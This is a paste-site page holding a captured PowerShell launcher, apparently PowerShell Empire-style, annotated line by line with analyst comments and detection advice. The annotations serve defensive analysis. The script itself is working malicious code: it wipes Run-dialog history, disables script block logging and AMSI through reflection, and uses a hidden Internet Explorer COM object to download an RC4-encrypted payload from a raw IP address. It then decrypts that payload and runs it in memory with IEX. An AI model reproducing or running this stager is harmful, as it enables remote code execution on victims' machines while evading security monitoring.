
Untitled

a guest Oct 12th, 2017 49 Never
  # Captured PowerShell launcher, kept byte-for-byte so strings and casing stay usable for matching.
  # The leading "N." on each line is the paste site's list gutter, not part of the script.
  #
  # Items 1-4: anti-forensic cleanup. The here-string holds one `REG DELETE ... /f` command that removes
  # the current user's Explorer\RunMRU key (the Run-dialog history) and is run through Invoke-Expression.
  # NOTE(review): clearing RunMRU suggests the launcher was started from the Run dialog; that is inferred,
  # not shown on this page.
  # Detection: reg.exe spawned by powershell.exe with "RunMRU" on its command line; a missing or freshly
  # re-created RunMRU key during triage is itself worth recording.
  1. $command = @'
  2. REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
  3. '@
  4. Invoke-Expression -Command:$command
  # Item 5: single-line stager. In statement order it:
  #   1. Reads the non-public static field 'cachedGroupPolicySettings' of System.Management.Automation.Utils
  #      by reflection and sets ScriptBlockLogging -> EnableScriptBlockLogging and
  #      EnableScriptBlockInvocationLogging to 0. Only the in-process cache is touched; no registry or
  #      policy write appears here, so host policy will still show logging as configured.
  #   2. If System.Management.Automation.AmsiUtils resolves (the `|?{$_}` guard), sets its non-public static
  #      field 'amsiInitFailed' to $true, so later content in this process is not submitted to AMSI.
  #   3. Sets ServicePointManager.Expect100Continue to 0.
  #   4. $K = ASCII bytes of the hard-coded 32-character string. $R is a script block taking (data, key):
  #      a 256-entry state array is permuted with the key, then each data byte is XORed with a keystream
  #      byte, which is the RC4 construction.
  #   5. Creates the InternetExplorer.Application COM object, silent and hidden, and calls navigate2 on
  #      $ser+$t (http://108.208.76.40:80/admin/get.php) with flags 14 and one extra request header.
  #      14 = 2+4+8 = navNoHistory | navNoReadFromCache | navNoWriteToCache. It then polls $ie.busy
  #      every 100 ms.
  #   6. Reads the response body's InnerHtml via InvokeMember, Base64-decodes it (the catch block discards
  #      any decode error), takes bytes 0..3 as $IV and the remainder as ciphertext, decrypts with
  #      key = $IV + $K, joins the result as characters and pipes it to IEX.
  #
  # Defender notes:
  #   - The HTTP request is made by the Internet Explorer COM server, not by powershell.exe, so network
  #     rules keyed on the PowerShell process will not see it. Correlate powershell.exe creating the IE COM
  #     object with an outbound connection to a bare IP. NOTE(review): the server usually appears as
  #     iexplore.exe started with -Embedding; confirm in your telemetry.
  #   - Mixed case, 'ScriptB'+'lockLogging'-style concatenation and the backtick inside "GeTFIe`ld" defeat
  #     literal, case-sensitive signatures; normalise case and strip backticks and concatenation before
  #     matching on cachedGroupPolicySettings, amsiInitFailed, or InternetExplorer.Application followed by IEX.
  #   - The header name CF-RAY imitates a CDN header while the destination is a raw IP over plain HTTP.
  #     That mismatch, the /admin/get.php path and the header value are usable network indicators from
  #     this sample.
  #   - The next stage exists only in memory after decryption; recovering it needs the response body plus
  #     the key material on this line, so preserve both during collection.
  #   - NOTE(review): the layout (logging and AMSI tampering, RC4 with a 4-byte IV prefix, /admin/get.php)
  #     resembles the publicly documented PowerShell Empire launcher; confirm before attributing.
  #   - Tampering is per-process, so transcription and module logging forwarded off-host, and process
  #     command-line auditing, still capture this one-liner itself.
  5. $GrouPPOlIcYSeTtiNGs = [rEf].AsSEMBly.GeTType('System.Management.Automation.Utils')."GeTFIe`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GetValue($nuLL);$GroupPOliCYSETtINGs['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;$GrOuPPOLiCYSEttingS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;[ReF].ASSEmBLy.GetTYpe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFiELD('amsiInitFailed','NonPublic,Static').SETVaLUe($NuLL,$true)};[SysteM.NeT.SeRvICEPoiNTManAgeR]::ExPeCt100CONtInue=0;$K=[SYstEm.TEXt.EnCoDiNg]::ASCII.GeTBYTeS('OEF|_^67lU}cdebzLR1fv<*nIA:ox9{~');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXOr$S[($S[$I]+$S[$H])%256]}};$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;$ser='http://108.208.76.40:80';$t='/admin/get.php';$ie.navigate2($ser+$t,$fl,0,$Null,'CF-RAY: Wv01eRhPrIjneDbamWNznOKUenY=');while($ie.busy){Start-Sleep -Milliseconds 100};$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}$IV=$daTa[0..3];$dAta=$dATa[4..$DaTa.lENGtH];-joIn[ChaR[]](& $R $data ($IV+$K))|IEX